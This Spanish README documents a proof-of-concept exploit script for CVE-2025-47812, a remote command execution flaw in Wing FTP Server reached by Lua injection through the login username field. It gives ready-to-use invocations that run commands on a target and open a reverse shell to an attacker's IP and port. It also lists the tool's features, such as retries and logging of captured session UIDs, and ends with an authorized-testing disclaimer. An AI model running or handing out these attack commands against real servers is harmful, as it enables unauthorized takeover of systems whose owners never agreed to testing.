
Exploit de ejecución remota de comandos para Wing FTP Server (CVE-2025-47812)
Este repositorio proporciona un exploit de prueba de concepto para CVE-2025-47812, una vulnerabilidad de ejecución remota de comandos (RCE) en Wing FTP Server. Un atacante puede inyectar y ejecutar comandos arbitrarios del sistema basados en Lua abusando del parámetro username durante la autenticación, lo que resulta en una ejecución remota de código completa.
found_uids.txtEjecutar un comando shell simple:
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
Activar un reverse shell:
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
Modo de prueba (no se enviarán solicitudes):
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
| Característica/Mejora | Descripción |
|---|---|
| ✅ Análisis de argumentos | Añadido soporte CLI con argparse para modo no interactivo |
| 🔐 Validación de entrada | Asegura una URL/IP/puerto válidos antes de intentar el exploit |
| 📦 Refactorización de cabeceras | Extraídas las cabeceras HTTP en una función reutilizable para consistencia |
| 📄 Registro de UID | Guarda tokens UID exitosos en found_uids.txt |
| 🧪 Modo de prueba | Permite pruebas seguras sin enviar solicitudes (--dry-run) |
| 🕒 Timeout + Reintentos | Añade tiempo de espera y reintentos automáticos en caso de fallo |
| 🧼 Legibilidad del payload | Reformateada la cadena de inyección Lua para claridad y mantenimiento |
| 📊 Salida estructurada | Envueltas las respuestas del servidor y la información del payload con delimitadores para facilitar la lectura |
| ⚠️ Comprobación de códigos de estado | Advierte al usuario si el objetivo devuelve códigos de estado HTTP inesperados |
| 📝 Sistema de registro | Reemplaza print() con el módulo logging de Python para un mejor control de la verbosidad |
Este proyecto está destinado únicamente a pruebas de seguridad educativas y autorizadas.
No use esta herramienta contra sistemas que no posea o para los que no tenga permiso explícito para probar.